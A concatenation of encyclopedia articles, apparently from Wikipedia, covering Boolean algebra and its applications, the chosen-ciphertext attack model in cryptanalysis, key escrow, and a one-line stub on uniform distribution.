The shapes associated with the gates for conjunction (AND-gates), disjunction (OR-gates), and complement (inverters) are as follows:[30] The lines on the left of each gate represent input wires orports. The value of the input is represented by a voltage on the lead. For so-called "active-high" logic, 0 is represented by a voltage close to zero or "ground," while 1 is represented by a voltage close to the supply voltage; active-low reverses this. The line on the right of each gate represents the output port, which normally follows the same voltage conventions as the input ports. Complement is implemented with an inverter gate. The triangle denotes the operation that simply copies the input to the output; the small circle on the output denotes the actual inversion complementing the input. The convention of putting such a circle on any port means that the signal passing through this port is complemented on the way through, whether it is an input or output port. Theduality principle, orDe Morgan's laws, can be understood as asserting that complementing all three ports of an AND gate converts it to an OR gate and vice versa, as shown in Figure 4 below. Complementing both ports of an inverter however leaves the operation unchanged. More generally, one may complement any of the eight subsets of the three ports of either an AND or OR gate. The resulting sixteen possibilities give rise to only eight Boolean operations, namely those with an odd number of 1s in their truth table. There are eight such because the "odd-bit-out" can be either 0 or 1 and can go in any of four positions in the truth table. There being sixteen binary Boolean operations, this must leave eight operations with an even number of 1s in their truth tables. Two of these are the constants 0 and 1 (as binary operations that ignore both their inputs); four are the operations that depend nontrivially on exactly one of their two inputs, namelyx,y, ¬x, and ¬y; and the remaining two arex⊕y(XOR) and its complementx≡y. The term "algebra" denotes both a subject, namely the subject ofalgebra, and an object, namely analgebraic structure. Whereas the foregoing has addressed the subject of Boolean algebra, this section deals with mathematical objects called Boolean algebras, defined in full generality as any model of the Boolean laws. We begin with a special case of the notion definable without reference to the laws, namely concrete Boolean algebras, and then givethe formal definitionof the general notion. Aconcrete Boolean algebraorfield of setsis any nonempty set of subsets of a given setXclosed under the set operations ofunion,intersection, andcomplementrelative toX.[5] (HistoricallyXitself was required to be nonempty as well to exclude the degenerate or one-element Boolean algebra, which is the one exception to the rule that all Boolean algebras satisfy the same equations since the degenerate algebra satisfies every equation. However, this exclusion conflicts with the preferred purely equational definition of "Boolean algebra", there being no way to rule out the one-element algebra using only equations— 0 ≠ 1 does not count, being a negated equation. Hence modern authors allow the degenerate Boolean algebra and letXbe empty.) Example 1.Thepower set2XofX, consisting of allsubsetsofX. HereXmay be any set: empty, finite, infinite, or evenuncountable. Example 2.The empty set andX. This two-element algebra shows that a concrete Boolean algebra can be finite even when it consists of subsets of an infinite set. 
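Examples 1 and 2 can be checked mechanically. The sketch below (illustrative Python; the helper names are ours) verifies that the power set of a three-element X, and the two-element family consisting of the empty set and X, are each closed under union, intersection, and complement relative to X:

```python
from itertools import chain, combinations

X = frozenset({1, 2, 3})

def powerset(s):
    """All subsets of s, each as a frozenset."""
    return {frozenset(c) for c in chain.from_iterable(
        combinations(s, r) for r in range(len(s) + 1))}

def is_concrete_boolean_algebra(family, universe):
    """Closure under union, intersection, and complement relative to universe."""
    return all(
        a | b in family and a & b in family and universe - a in family
        for a in family for b in family
    )

assert is_concrete_boolean_algebra(powerset(X), X)        # Example 1
assert is_concrete_boolean_algebra({frozenset(), X}, X)   # Example 2
```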
It can be seen that every field of subsets of X must contain the empty set and X. Hence no smaller example is possible, other than the degenerate algebra obtained by taking X to be empty so as to make the empty set and X coincide.

Example 3. The set of finite and cofinite sets of integers, where a cofinite set is one omitting only finitely many integers. This is clearly closed under complement, and is closed under union because the union of a cofinite set with any set is cofinite, while the union of two finite sets is finite. Intersection behaves like union with "finite" and "cofinite" interchanged. This example is countably infinite because there are only countably many finite sets of integers.

Example 4. For a less trivial example of the point made by example 2, consider a Venn diagram formed by n closed curves partitioning the diagram into 2^n regions, and let X be the (infinite) set of all points in the plane not on any curve but somewhere within the diagram. The interior of each region is thus an infinite subset of X, and every point in X is in exactly one region. Then the set of all 2^(2^n) possible unions of regions (including the empty set obtained as the union of the empty set of regions and X obtained as the union of all 2^n regions) is closed under union, intersection, and complement relative to X and therefore forms a concrete Boolean algebra. Again, there are finitely many subsets of an infinite set forming a concrete Boolean algebra, with example 2 arising as the case n = 0 of no curves.

A subset Y of X can be identified with an indexed family of bits with index set X, with the bit indexed by x ∈ X being 1 or 0 according to whether or not x ∈ Y. (This is the so-called characteristic function notion of a subset.) For example, a 32-bit computer word consists of 32 bits indexed by the set {0, 1, 2, ..., 31}, with 0 and 31 indexing the low and high order bits respectively. For a smaller example, if X = {a, b, c} where a, b, c are viewed as bit positions in that order from left to right, the eight subsets {}, {c}, {b}, {b,c}, {a}, {a,c}, {a,b}, and {a,b,c} of X can be identified with the respective bit vectors 000, 001, 010, 011, 100, 101, 110, and 111. Bit vectors indexed by the set of natural numbers are infinite sequences of bits, while those indexed by the reals in the unit interval [0,1] are packed too densely to be able to write conventionally but nonetheless form well-defined indexed families (imagine coloring every point of the interval [0,1] either black or white independently; the black points then form an arbitrary subset of [0,1]).

From this bit vector viewpoint, a concrete Boolean algebra can be defined equivalently as a nonempty set of bit vectors all of the same length (more generally, indexed by the same set) and closed under the bit vector operations of bitwise ∧, ∨, and ¬, as in 1010 ∧ 0110 = 0010, 1010 ∨ 0110 = 1110, and ¬1010 = 0101, the bit vector realizations of intersection, union, and complement respectively.

The set {0,1} and its Boolean operations as treated above can be understood as the special case of bit vectors of length one, which by the identification of bit vectors with subsets can also be understood as the two subsets of a one-element set. This is called the prototypical Boolean algebra, justified by the following observation: the laws satisfied by all nondegenerate concrete Boolean algebras are exactly the laws satisfied by the prototypical Boolean algebra. This observation is proved as follows. Certainly any law satisfied by all concrete Boolean algebras is satisfied by the prototypical one since it is concrete.
Conversely, any law that fails for some concrete Boolean algebra must have failed at a particular bit position, in which case that position by itself furnishes a one-bit counterexample to that law. Nondegeneracy ensures the existence of at least one bit position because there is only one empty bit vector.

The final goal of the next section can be understood as eliminating "concrete" from the above observation. That goal is reached via the stronger observation that, up to isomorphism, all Boolean algebras are concrete.

The Boolean algebras so far have all been concrete, consisting of bit vectors or equivalently of subsets of some set. Such a Boolean algebra consists of a set and operations on that set which can be shown to satisfy the laws of Boolean algebra. Instead of showing that the Boolean laws are satisfied, we can instead postulate a set X, two binary operations on X, and one unary operation, and require that those operations satisfy the laws of Boolean algebra. The elements of X need not be bit vectors or subsets but can be anything at all. This leads to the more general abstract definition. For the purposes of this definition it is irrelevant how the operations came to satisfy the laws, whether by fiat or proof. All concrete Boolean algebras satisfy the laws (by proof rather than fiat), whence every concrete Boolean algebra is a Boolean algebra according to our definitions. This axiomatic definition of a Boolean algebra as a set and certain operations satisfying certain laws or axioms by fiat is entirely analogous to the abstract definitions of group, ring, field etc. characteristic of modern or abstract algebra.

Given any complete axiomatization of Boolean algebra, such as the axioms for a complemented distributive lattice, a sufficient condition for an algebraic structure of this kind to satisfy all the Boolean laws is that it satisfy just those axioms. The following is therefore an equivalent definition. The section on axiomatization lists other axiomatizations, any of which can be made the basis of an equivalent definition.

Although every concrete Boolean algebra is a Boolean algebra, not every Boolean algebra need be concrete. Let n be a square-free positive integer, one not divisible by the square of an integer, for example 30 but not 12. The operations of greatest common divisor, least common multiple, and division into n (that is, ¬x = n/x) can be shown to satisfy all the Boolean laws when their arguments range over the positive divisors of n. Hence those divisors form a Boolean algebra. These divisors are not subsets of a set, making the divisors of n a Boolean algebra that is not concrete according to our definitions. However, if each divisor of n is represented by the set of its prime factors, this nonconcrete Boolean algebra is isomorphic to the concrete Boolean algebra consisting of all sets of prime factors of n, with union corresponding to least common multiple, intersection to greatest common divisor, and complement to division into n. So this example, while not technically concrete, is at least "morally" concrete via this representation, called an isomorphism; a small computational check of this example is sketched below. This example is an instance of the notion of a representable Boolean algebra, one that is isomorphic to a concrete Boolean algebra. The next question, whether every Boolean algebra is representable, is answered positively: every Boolean algebra is indeed representable. That is, up to isomorphism, abstract and concrete Boolean algebras are the same thing. This result depends on the Boolean prime ideal theorem, a choice principle slightly weaker than the axiom of choice.
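Here is the small computational check promised above, a Python sketch (helper names are ours) that verifies a sample of Boolean laws for the divisors of 30 under gcd, lcm, and x ↦ 30/x, and exhibits the isomorphism onto the subsets of {2, 3, 5}:

```python
from itertools import product
from math import gcd

N = 30
divisors = [d for d in range(1, N + 1) if N % d == 0]   # 1, 2, 3, 5, 6, 10, 15, 30

meet = gcd                                   # gcd plays the role of AND
join = lambda a, b: a * b // gcd(a, b)       # lcm plays the role of OR
comp = lambda a: N // a                      # division into N is complement

for x, y, z in product(divisors, repeat=3):
    assert meet(x, join(y, z)) == join(meet(x, y), meet(x, z))   # distributivity
    assert join(x, meet(x, y)) == x                              # absorption
    assert comp(meet(x, y)) == join(comp(x), comp(y))            # De Morgan
    assert meet(x, comp(x)) == 1 and join(x, comp(x)) == N       # complementation

# The isomorphism onto subsets of {2, 3, 5}: a divisor maps to its prime factors.
primes = (2, 3, 5)
to_set = lambda d: frozenset(p for p in primes if d % p == 0)
for x, y in product(divisors, repeat=2):
    assert to_set(meet(x, y)) == to_set(x) & to_set(y)
    assert to_set(join(x, y)) == to_set(x) | to_set(y)
```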
This strong relationship implies a weaker result strengthening the observation in the previous subsection to the following easy consequence of representability: the laws satisfied by all Boolean algebras, concrete or not, are exactly the laws satisfied by the prototypical Boolean algebra. It is weaker in the sense that it does not of itself imply representability. Boolean algebras are special here; for example, a relation algebra is a Boolean algebra with additional structure, but it is not the case that every relation algebra is representable in the sense appropriate to relation algebras.

The above definition of an abstract Boolean algebra as a set together with operations satisfying "the" Boolean laws raises the question of what those laws are. A simplistic answer is "all Boolean laws", which can be defined as all equations that hold for the Boolean algebra of 0 and 1. However, since there are infinitely many such laws, this is not a satisfactory answer in practice, leading to the question of whether it suffices to require only finitely many laws to hold. In the case of Boolean algebras, the answer is "yes": the finitely many equations listed above are sufficient. Thus, Boolean algebra is said to be finitely axiomatizable or finitely based.

Moreover, the number of equations needed can be further reduced. To begin with, some of the above laws are implied by some of the others. A sufficient subset of the above laws consists of the pairs of associativity, commutativity, and absorption laws, distributivity of ∧ over ∨ (or the other distributivity law—one suffices), and the two complement laws. In fact, this is the traditional axiomatization of Boolean algebra as a complemented distributive lattice.

By introducing additional laws not listed above, it becomes possible to shorten the list of needed equations yet further; for instance, with the vertical bar representing the Sheffer stroke operation, the single axiom {\displaystyle ((a\mid b)\mid c)\mid (a\mid ((a\mid c)\mid a))=c} is sufficient to completely axiomatize Boolean algebra. It is also possible to find longer single axioms using more conventional operations; see Minimal axioms for Boolean algebra.[32]

Propositional logic is a logical system that is intimately connected to Boolean algebra.[5] Many syntactic concepts of Boolean algebra carry over to propositional logic with only minor changes in notation and terminology, while the semantics of propositional logic are defined via Boolean algebras in a way that the tautologies (theorems) of propositional logic correspond to equational theorems of Boolean algebra.

Syntactically, every Boolean term corresponds to a propositional formula of propositional logic. In this translation between Boolean algebra and propositional logic, Boolean variables x, y, ... become propositional variables (or atoms) P, Q, ...; Boolean terms such as x ∨ y become propositional formulas P ∨ Q; 0 becomes false or ⊥, and 1 becomes true or T. It is convenient when referring to generic propositions to use Greek letters Φ, Ψ, ... as metavariables (variables outside the language of propositional calculus, used when talking about propositional calculus) to denote propositions.

The semantics of propositional logic rely on truth assignments. The essential idea of a truth assignment is that the propositional variables are mapped to elements of a fixed Boolean algebra, and then the truth value of a propositional formula using these letters is the element of the Boolean algebra that is obtained by computing the value of the Boolean term corresponding to the formula.
In classical semantics, only the two-element Boolean algebra is used, while inBoolean-valued semanticsarbitrary Boolean algebras are considered. Atautologyis a propositional formula that is assigned truth value1by every truth assignment of its propositional variables to an arbitrary Boolean algebra (or, equivalently, every truth assignment to the two element Boolean algebra). These semantics permit a translation between tautologies of propositional logic and equational theorems of Boolean algebra. Every tautology Φ of propositional logic can be expressed as the Boolean equation Φ = 1, which will be a theorem of Boolean algebra. Conversely, every theorem Φ = Ψ of Boolean algebra corresponds to the tautologies (Φ ∨ ¬Ψ) ∧ (¬Φ ∨ Ψ) and (Φ ∧ Ψ) ∨ (¬Φ ∧ ¬Ψ). If → is in the language, these last tautologies can also be written as (Φ → Ψ) ∧ (Ψ → Φ), or as two separate theorems Φ → Ψ and Ψ → Φ; if ≡ is available, then the single tautology Φ ≡ Ψ can be used. One motivating application of propositional calculus is the analysis of propositions and deductive arguments in natural language.[33]Whereas the proposition "ifx= 3, thenx+ 1 = 4" depends on the meanings of such symbols as + and 1, the proposition "ifx= 3, thenx= 3" does not; it is true merely by virtue of its structure, and remains true whether "x= 3" is replaced by "x= 4" or "the moon is made of green cheese." The generic or abstract form of this tautology is "ifP, thenP," or in the language of Boolean algebra,P→P.[citation needed] ReplacingPbyx= 3 or any other proposition is calledinstantiationofPby that proposition. The result of instantiatingPin an abstract proposition is called aninstanceof the proposition. Thus,x= 3 →x= 3 is a tautology by virtue of being an instance of the abstract tautologyP→P. All occurrences of the instantiated variable must be instantiated with the same proposition, to avoid such nonsense asP→x= 3 orx= 3 →x= 4. Propositional calculus restricts attention to abstract propositions, those built up from propositional variables using Boolean operations. Instantiation is still possible within propositional calculus, but only by instantiating propositional variables by abstract propositions, such as instantiatingQbyQ→PinP→ (Q→P) to yield the instanceP→ ((Q→P) →P). (The availability of instantiation as part of the machinery of propositional calculus avoids the need for metavariables within the language of propositional calculus, since ordinary propositional variables can be considered within the language to denote arbitrary propositions. The metavariables themselves are outside the reach of instantiation, not being part of the language of propositional calculus but rather part of the same language for talking about it that this sentence is written in, where there is a need to be able to distinguish propositional variables and their instantiations as being distinct syntactic entities.) An axiomatization of propositional calculus is a set of tautologies calledaxiomsand one or more inference rules for producing new tautologies from old. Aproofin an axiom systemAis a finite nonempty sequence of propositions each of which is either an instance of an axiom ofAor follows by some rule ofAfrom propositions appearing earlier in the proof (thereby disallowing circular reasoning). The last proposition is thetheoremproved by the proof. Every nonempty initial segment of a proof is itself a proof, whence every proposition in a proof is itself a theorem. 
An axiomatization issoundwhen every theorem is a tautology, andcompletewhen every tautology is a theorem.[34] Propositional calculus is commonly organized as aHilbert system, whose operations are just those of Boolean algebra and whose theorems are Boolean tautologies, those Boolean terms equal to the Boolean constant 1. Another form issequent calculus, which has two sorts, propositions as in ordinary propositional calculus, and pairs of lists of propositions calledsequents, such asA∨B,A∧C, ... ⊢A,B→C, ....The two halves of a sequent are called the antecedent and the succedent respectively. The customary metavariable denoting an antecedent or part thereof is Γ, and for a succedent Δ; thus Γ,A⊢ Δ would denote a sequent whose succedent is a list Δ and whose antecedent is a list Γ with an additional propositionAappended after it. The antecedent is interpreted as the conjunction of its propositions, the succedent as the disjunction of its propositions, and the sequent itself as theentailmentof the succedent by the antecedent. Entailment differs from implication in that whereas the latter is a binaryoperationthat returns a value in a Boolean algebra, the former is a binaryrelationwhich either holds or does not hold. In this sense, entailment is anexternalform of implication, meaning external to the Boolean algebra, thinking of the reader of the sequent as also being external and interpreting and comparing antecedents and succedents in some Boolean algebra. The natural interpretation of ⊢ is as ≤ in the partial order of the Boolean algebra defined byx≤yjust whenx∨y=y. This ability to mix external implication ⊢ and internal implication → in the one logic is among the essential differences between sequent calculus and propositional calculus.[35] Boolean algebra as the calculus of two values is fundamental to computer circuits, computer programming, and mathematical logic, and is also used in other areas of mathematics such as set theory and statistics.[5] In the early 20th century, several electrical engineers[who?]intuitively recognized that Boolean algebra was analogous to the behavior of certain types of electrical circuits.Claude Shannonformally proved such behavior was logically equivalent to Boolean algebra in his 1937 master's thesis,A Symbolic Analysis of Relay and Switching Circuits. Today, all modern general-purposecomputersperform their functions using two-value Boolean logic; that is, their electrical circuits are a physical manifestation of two-value Boolean logic. They achieve this in various ways: asvoltages on wiresin high-speed circuits and capacitive storage devices, as orientations of amagnetic domainin ferromagnetic storage devices, as holes inpunched cardsorpaper tape, and so on. (Some early computers used decimal circuits or mechanisms instead of two-valued logic circuits.) Of course, it is possible to code more than two symbols in any given medium. For example, one might use respectively 0, 1, 2, and 3 volts to code a four-symbol alphabet on a wire, or holes of different sizes in a punched card. In practice, the tight constraints of high speed, small size, and low power combine to make noise a major factor. This makes it hard to distinguish between symbols when there are several possible symbols that could occur at a single site. Rather than attempting to distinguish between four voltages on one wire, digital designers have settled on two voltages per wire, high and low. Computers use two-value Boolean circuits for the above reasons. 
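The partial order x ≤ y just when x ∨ y = y, used above to interpret entailment, is easy to experiment with on bit vectors, where it coincides with "every bit set in x is also set in y". A minimal Python sketch (illustrative only):

```python
def leq(x: int, y: int) -> bool:
    """x <= y in the Boolean algebra of 4-bit vectors: x OR y equals y."""
    return x | y == y

# Equivalent characterizations of the same order, checked exhaustively.
for x in range(16):
    for y in range(16):
        assert leq(x, y) == (x & y == x) == ((x & ~y & 0xF) == 0)

assert leq(0b0010, 0b0110)        # {bit 1} is contained in {bits 1, 2}
assert not leq(0b1010, 0b0110)
```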
The most common computer architectures use ordered sequences of Boolean values, called bits, 32 or 64 of them at a time, e.g. 01101000110101100101010101001011. When programming in machine code, assembly language, and certain other programming languages, programmers work with the low-level digital structure of the data registers. These registers operate on voltages, where zero volts represents Boolean 0, and a reference voltage (often +5 V, +3.3 V, or +1.8 V) represents Boolean 1. Such languages support both numeric operations and logical operations. In this context, "numeric" means that the computer treats sequences of bits as binary numbers (base two numbers) and executes arithmetic operations like add, subtract, multiply, or divide. "Logical" refers to the Boolean logical operations of disjunction, conjunction, and negation between two sequences of bits, in which each bit in one sequence is simply compared to its counterpart in the other sequence. Programmers therefore have the option of working in and applying the rules of either numeric algebra or Boolean algebra as needed. A core differentiating feature between these families of operations is the existence of the carry operation in the first but not the second.

Other areas where two values are a good choice are the law and mathematics. In everyday relaxed conversation, nuanced or complex answers such as "maybe" or "only on the weekend" are acceptable. In more focused situations such as a court of law or theorem-based mathematics, however, it is deemed advantageous to frame questions so as to admit a simple yes-or-no answer—is the defendant guilty or not guilty, is the proposition true or false—and to disallow any other answer. However limiting this might prove in practice for the respondent, the principle of the simple yes–no question has become a central feature of both judicial and mathematical logic, making two-valued logic deserving of organization and study in its own right.

A central concept of set theory is membership. An organization may permit multiple degrees of membership, such as novice, associate, and full. With sets, however, an element is either in or out. The candidates for membership in a set work just like the wires in a digital computer: each candidate is either a member or a nonmember, just as each wire is either high or low.

Algebra being a fundamental tool in any area amenable to mathematical treatment, these considerations combine to make the algebra of two values of fundamental importance to computer hardware, mathematical logic, and set theory.

Two-valued logic can be extended to multi-valued logic, notably by replacing the Boolean domain {0, 1} with the unit interval [0, 1], in which case rather than only taking values 0 or 1, any value between and including 0 and 1 can be assumed. Algebraically, negation (NOT) is replaced with 1 − x, conjunction (AND) is replaced with multiplication (xy), and disjunction (OR) is defined via De Morgan's law. Interpreting these values as logical truth values yields a multi-valued logic, which forms the basis for fuzzy logic and probabilistic logic. In these interpretations, a value is interpreted as the "degree" of truth – to what extent a proposition is true, or the probability that the proposition is true.

The original application for Boolean operations was mathematical logic, where they combine the truth values, true or false, of individual formulas.
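Returning to the multi-valued extension described above, with values in [0, 1], negation as 1 − x, conjunction as multiplication, and disjunction obtained from De Morgan's law, the connectives can be tried out numerically. A minimal Python sketch (illustrative only; the function names are ours):

```python
def f_not(x: float) -> float:
    return 1.0 - x

def f_and(x: float, y: float) -> float:
    return x * y                               # multiplication as conjunction

def f_or(x: float, y: float) -> float:
    # defined via De Morgan's law: x OR y = NOT(NOT x AND NOT y) = x + y - x*y
    return f_not(f_and(f_not(x), f_not(y)))

print(f_and(0.8, 0.5))   # ≈ 0.4
print(f_or(0.8, 0.5))    # ≈ 0.9
print(f_not(0.8))        # ≈ 0.2 (up to floating-point rounding)

# Restricted to the endpoints 0 and 1, these reduce to the Boolean operations.
for x in (0.0, 1.0):
    for y in (0.0, 1.0):
        assert f_and(x, y) == min(x, y) and f_or(x, y) == max(x, y)
```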
Natural languages such as English have words for several Boolean operations, in particular conjunction (and), disjunction (or), negation (not), and implication (implies). But not is synonymous with and not. When used to combine situational assertions such as "the block is on the table" and "cats drink milk", which naïvely are either true or false, these logical connectives often behave like their logical counterparts. However, with descriptions of behavior such as "Jim walked through the door", one starts to notice differences such as failure of commutativity; for example, the conjunction of "Jim opened the door" with "Jim walked through the door" in that order is not equivalent to their conjunction in the other order, since and usually means and then in such cases. Questions can be similar: the order "Is the sky blue, and why is the sky blue?" makes more sense than the reverse order. Conjunctive commands about behavior are like behavioral assertions, as in get dressed and go to school. Disjunctive commands such as love me or leave me or fish or cut bait tend to be asymmetric via the implication that one alternative is less preferable. Conjoined nouns such as tea and milk generally describe aggregation as with set union, while tea or milk is a choice. However, context can reverse these senses, as in your choices are coffee and tea, which usually means the same as your choices are coffee or tea (alternatives). Double negation, as in "I don't not like milk", rarely means literally "I do like milk" but rather conveys some sort of hedging, as though to imply that there is a third possibility. "Not not P" can be loosely interpreted as "surely P", and although P necessarily implies "not not P", the converse is suspect in English, much as with intuitionistic logic. In view of the highly idiosyncratic usage of conjunctions in natural languages, Boolean algebra cannot be considered a reliable framework for interpreting them.

Boolean operations are used in digital logic to combine the bits carried on individual wires, thereby interpreting them over {0, 1}. When a vector of n identical binary gates is used to combine two bit vectors each of n bits, the individual bit operations can be understood collectively as a single operation on values from a Boolean algebra with 2^n elements.

Naive set theory interprets Boolean operations as acting on subsets of a given set X. As we saw earlier, this behavior exactly parallels the coordinate-wise combinations of bit vectors, with the union of two sets corresponding to the disjunction of two bit vectors and so on.

The 256-element free Boolean algebra on three generators is deployed in computer displays based on raster graphics, which use bit blit to manipulate whole regions consisting of pixels, relying on Boolean operations to specify how the source region should be combined with the destination, typically with the help of a third region called the mask. Modern video cards offer all 2^(2^3) = 256 ternary operations for this purpose, with the choice of operation being a one-byte (8-bit) parameter. The constants SRC = 0xaa or 0b10101010, DST = 0xcc or 0b11001100, and MSK = 0xf0 or 0b11110000 allow Boolean operations such as (SRC^DST)&MSK (meaning XOR the source and destination and then AND the result with the mask) to be written directly as a constant denoting a byte calculated at compile time: 0x60 in the (SRC^DST)&MSK example, 0x66 if just SRC^DST, etc.
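One way to see where such constant bytes come from is to evaluate the expressions on the truth-table constants directly. The Python sketch below reproduces the compile-time bytes; the bit-ordering convention assumed in the final loop is one common choice consistent with the constants given in the text:

```python
SRC, DST, MSK = 0xAA, 0xCC, 0xF0      # truth-table constants from the text

print(hex(SRC ^ DST))                 # 0x66
print(hex((SRC ^ DST) & MSK))         # 0x60

# Each bit position i encodes one input combination (s, d, m); the i-th bit of
# the constant byte is the value of the ternary operation on that combination.
rop = (SRC ^ DST) & MSK
for i in range(8):
    s, d, m = i & 1, (i >> 1) & 1, (i >> 2) & 1
    assert (rop >> i) & 1 == (s ^ d) & m
```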
At run time the video card interprets the byte as the raster operation indicated by the original expression in a uniform way that requires remarkably little hardware and which takes time completely independent of the complexity of the expression. Solid modelingsystems forcomputer aided designoffer a variety of methods for building objects from other objects, combination by Boolean operations being one of them. In this method the space in which objects exist is understood as a setSofvoxels(the three-dimensional analogue of pixels in two-dimensional graphics) and shapes are defined as subsets ofS, allowing objects to be combined as sets via union, intersection, etc. One obvious use is in building a complex shape from simple shapes simply as the union of the latter. Another use is in sculpting understood as removal of material: any grinding, milling, routing, or drilling operation that can be performed with physical machinery on physical materials can be simulated on the computer with the Boolean operationx∧ ¬yorx−y, which in set theory is set difference, remove the elements ofyfrom those ofx. Thus given two shapes one to be machined and the other the material to be removed, the result of machining the former to remove the latter is described simply as their set difference. Search engine queries also employ Boolean logic. For this application, each web page on the Internet may be considered to be an "element" of a "set." The following examples use a syntax supported byGoogle.[NB 1]
https://en.wikipedia.org/wiki/Boolean_algebra
A chosen-ciphertext attack (CCA) is an attack model for cryptanalysis where the cryptanalyst can gather information by obtaining the decryptions of chosen ciphertexts. From these pieces of information the adversary can attempt to recover the secret key used for decryption.

For formal definitions of security against chosen-ciphertext attacks, see for example: Michael Luby[1] and Mihir Bellare et al.[2]

A number of otherwise secure schemes can be defeated under chosen-ciphertext attack. For example, the El Gamal cryptosystem is semantically secure under chosen-plaintext attack, but this semantic security can be trivially defeated under a chosen-ciphertext attack (a toy illustration is sketched below). Early versions of RSA padding used in the SSL protocol were vulnerable to a sophisticated adaptive chosen-ciphertext attack which revealed SSL session keys. Chosen-ciphertext attacks have implications for some self-synchronizing stream ciphers as well. Designers of tamper-resistant cryptographic smart cards must be particularly cognizant of these attacks, as these devices may be completely under the control of an adversary, who can issue a large number of chosen ciphertexts in an attempt to recover the hidden secret key.

It was not clear at all whether public key cryptosystems could withstand the chosen ciphertext attack until the initial breakthrough work of Moni Naor and Moti Yung in 1990, which suggested a mode of dual encryption with integrity proof (now known as the "Naor-Yung" encryption paradigm).[3] This work made the notion of security against chosen ciphertext attack much clearer than before and opened the research direction of constructing systems with various protections against variants of the attack.

When a cryptosystem is vulnerable to chosen-ciphertext attack, implementers must be careful to avoid situations in which an adversary might be able to decrypt chosen ciphertexts (i.e., avoid providing a decryption oracle). This can be more difficult than it appears, as even partially chosen ciphertexts can permit subtle attacks. Additionally, other issues exist, and some cryptosystems (such as RSA) use the same mechanism to sign messages and to decrypt them. This permits attacks when hashing is not used on the message to be signed. A better approach is to use a cryptosystem which is provably secure under chosen-ciphertext attack, including (among others) RSA-OAEP, secure under the random oracle heuristic, and Cramer-Shoup, which was the first practical public-key system provably secure against chosen-ciphertext attack without relying on random oracles. For symmetric encryption schemes it is known that authenticated encryption, which is a primitive based on symmetric encryption, gives security against chosen ciphertext attacks, as was first shown by Jonathan Katz and Moti Yung.[4]

Chosen-ciphertext attacks, like other attacks, may be adaptive or non-adaptive. In an adaptive chosen-ciphertext attack, the attacker can use the results from prior decryptions to inform their choices of which ciphertexts to have decrypted. In a non-adaptive attack, the attacker chooses the ciphertexts to have decrypted without seeing any of the resulting plaintexts. After seeing the plaintexts, the attacker can no longer obtain the decryption of additional ciphertexts.
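To make the ElGamal example above concrete, here is a toy Python sketch (tiny, insecure parameters chosen purely for illustration; requires Python 3.8+ for modular inverses via pow). Because textbook ElGamal ciphertexts are malleable, an attacker who may query a decryption oracle on any ciphertext except the challenge itself can still recover the challenge plaintext:

```python
import random

p = 467          # small prime, for illustration only
g = 2            # generator of a subgroup of Z_p^*
x = random.randrange(2, p - 1)    # private key
h = pow(g, x, p)                  # public key

def encrypt(m):
    r = random.randrange(2, p - 1)
    return (pow(g, r, p), (m * pow(h, r, p)) % p)

def decrypt(c1, c2):
    return (c2 * pow(pow(c1, x, p), -1, p)) % p

challenge = encrypt(123)          # ciphertext the attacker wants to read

def oracle(c1, c2):
    """Decryption oracle that refuses the exact challenge (the CCA2 rule)."""
    if (c1, c2) == challenge:
        raise ValueError("challenge ciphertext may not be queried")
    return decrypt(c1, c2)

# Attack: scale the second component, query the oracle, then undo the scaling.
c1, c2 = challenge
t = 2
mauled = (c1, (c2 * t) % p)       # decrypts to t * m mod p
recovered = (oracle(*mauled) * pow(t, -1, p)) % p
assert recovered == 123
print("recovered plaintext:", recovered)
```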
A specially noted variant of the chosen-ciphertext attack is the "lunchtime", "midnight", or "indifferent" attack, in which an attacker may make adaptive chosen-ciphertext queries but only up until a certain point, after which the attacker must demonstrate some improved ability to attack the system.[5]The term "lunchtime attack" refers to the idea that a user's computer, with the ability to decrypt, is available to an attacker while the user is out to lunch. This form of the attack was the first one commonly discussed: obviously, if the attacker has the ability to make adaptive chosen ciphertext queries, no encrypted message would be safe, at least until that ability is taken away. This attack is sometimes called the "non-adaptive chosen ciphertext attack";[6]here, "non-adaptive" refers to the fact that the attacker cannot adapt their queries in response to the challenge, which is given after the ability to make chosen ciphertext queries has expired. A (full) adaptive chosen-ciphertext attack is an attack in which ciphertexts may be chosen adaptively before and after a challenge ciphertext is given to the attacker, with only the stipulation that the challenge ciphertext may not itself be queried. This is a stronger attack notion than the lunchtime attack, and is commonly referred to as a CCA2 attack, as compared to a CCA1 (lunchtime) attack.[6]Few practical attacks are of this form. Rather, this model is important for its use in proofs of security against chosen-ciphertext attacks. A proof that attacks in this model are impossible implies that any realistic chosen-ciphertext attack cannot be performed. A practical adaptive chosen-ciphertext attack is the Bleichenbacher attack againstPKCS#1.[7] Numerous cryptosystems are proven secure against adaptive chosen-ciphertext attacks, some proving this security property based only on algebraic assumptions, some additionally requiring an idealized random oracle assumption. For example, theCramer-Shoup system[5]is secure based on number theoretic assumptions and no idealization, and after a number of subtle investigations it was also established that the practical schemeRSA-OAEPis secure under the RSA assumption in the idealized random oracle model.[8]
https://en.wikipedia.org/wiki/Chosen_ciphertext_attack
Key escrow(also known as a"fair" cryptosystem)[1]is an arrangement in which thekeysneeded to decryptencrypteddata are held inescrowso that, under certain circumstances, an authorizedthird partymay gain access to those keys. These third parties may include businesses, who may want access to employees' secure business-relatedcommunications, orgovernments, who may wish to be able to view the contents of encrypted communications (also known asexceptional access).[2] The technical problem is a largely structural one. Access to protectedinformationmust be providedonlyto the intended recipient and at least one third party. The third party should be permitted access only under carefully controlled conditions, for instance, acourt order. Thus far, no system design has been shown to meet this requirement fully on a technical basis alone. All proposed systems also require correct functioning of some social linkage, for instance the process of request for access, examination of request for 'legitimacy' (as by acourt), and granting of access by technical personnel charged with access control. All such linkages / controls have serious problems from a system design security perspective. Systems in which the key may not be changed easily are rendered especially vulnerable as the accidental release of the key will result in many devices becoming totally compromised, necessitating an immediate key change or replacement of the system. On a national level, key escrow is controversial in many countries for at least two reasons. One involves mistrust of the security of the structural escrow arrangement. Many countries have a long history of less than adequate protection of others' information by assorted organizations, public and private, even when the information is held only under an affirmative legal obligation to protect it from unauthorized access. Another is technical concerns for the additional vulnerabilities likely to be introduced by supporting key escrow operations.[2]Thus far, no key escrow system has been designed which meets both objections and nearly all have failed to meet even one. Key escrow is proactive, anticipating the need for access to keys; a retroactive alternative iskey disclosure law, where users are required to surrender keys upon demand by law enforcement, or else face legal penalties. Key disclosure law avoids some of the technical issues and risks of key escrow systems, but also introduces new risks like loss of keys and legal issues such as involuntaryself-incrimination. The ambiguous termkey recoveryis applied to both types of systems.
https://en.wikipedia.org/wiki/Key_recovery
Uniform distributionmay refer to:
https://en.wikipedia.org/wiki/Uniform_distribution
